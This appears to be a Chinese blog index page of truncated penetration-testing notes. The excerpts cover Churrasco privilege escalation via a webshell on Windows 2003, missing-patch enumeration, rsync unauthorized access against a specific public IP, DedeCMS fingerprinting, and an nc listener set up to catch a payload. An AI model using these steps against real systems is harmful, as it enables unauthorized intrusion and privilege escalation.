漏洞总结

2020-08-18pppooo137阅读(980)

第一部分：巴西烤肉提权 首先明白：Churrasco.exe是Windows2003系统下的一个本地提权漏洞，只有这个系统可以用巴西烤肉提权。 1.  大马检测一下脚本是否支持wscript.shell 如下图，检测结果是支持。 2.  支...

2020-08-18pppooo137阅读(446)

1.   执行下面命令可以查看当前服务器哪些补丁没有打，下面代码中是三行，将三行改为一行再使用（这里写三行目的是显示出来，不然显示不全，复制代码到txt文档，然后删除回车改为一行即可。） systeminfo>micropoor.tx...

2020-08-05pppooo137阅读(672)

1. 查看哪些版本存在漏洞： 在kali中输入命令：   searchsploit rsync 该漏洞存在于 873 端口 2. 测试漏洞是否存在： 在kali中输入：  rsync 59.188.219.28::       &...

2020-08-03pppooo137阅读(1158)

1.  判断升级时间：  /data/admin/ver.txt 2. 判断版本 /plus/guestbook.php 查看底部版权。 3. 判断是不是dede佐证  data/admin/allowurl.txt 4. 判断后台路径  ...

2020-08-01pppooo137阅读(911)

appscan 发现此漏洞，查找资料后总结如下： 1.  nc 建立本地监听 nc -l -p 8090 //-l的意思是使用监听模式，管控传入的资料。 -p 则是指定端口。 本机ip地址为  192.168.226.130 ,那么payl...